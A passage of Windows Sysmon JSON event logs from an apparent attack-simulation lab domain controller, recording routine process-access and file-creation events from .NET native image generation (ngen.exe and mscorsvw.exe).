07:03:00.763","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-00101DBE1000}","TargetProcessId":"2716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8890,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.794\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-0010C1C11000}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.794","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-0010C1C11000}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8891,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.794\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-0010C1C11000}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.794","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-0010C1C11000}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8892,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-0010C1C11000}\r\nTargetProcessId: 3012\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-0010C1C11000}","TargetProcessId":"3012","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8893,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:00.873\r\nProcessGuid: {E2A3D6B1-13A4-5F25-0000-0010C1C11000}\r\nProcessId: 3012\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bc4-0\\System.Xaml.Hosting.dll\r\nCreationUtcTime: 2020-08-01 07:03:00.873","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:00.873","ProcessGuid":"{E2A3D6B1-13A4-5F25-0000-0010C1C11000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bc4-0\\System.Xaml.Hosting.dll","CreationUtcTime":"2020-08-01 07:03:00.873","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8894,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.904\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-0010968C0F00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.904","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-0010968C0F00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8895,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.904\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137C-5F25-0000-0010968C0F00}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.904","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137C-5F25-0000-0010968C0F00}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8896,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.919\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A4-5F25-0000-00100CC71000}\r\nTargetProcessId: 4564\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.919","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A4-5F25-0000-00100CC71000}","TargetProcessId":"4564","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8897,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.951\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010D4980F00}\r\nTargetProcessId: 4880\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:00.951","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137E-5F25-0000-0010D4980F00}","TargetProcessId":"4880","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8898,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:00.951\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137E-5F25-0000-0010D4980F00}\r\nTargetProcessId: 4880\r\nTargetImage: 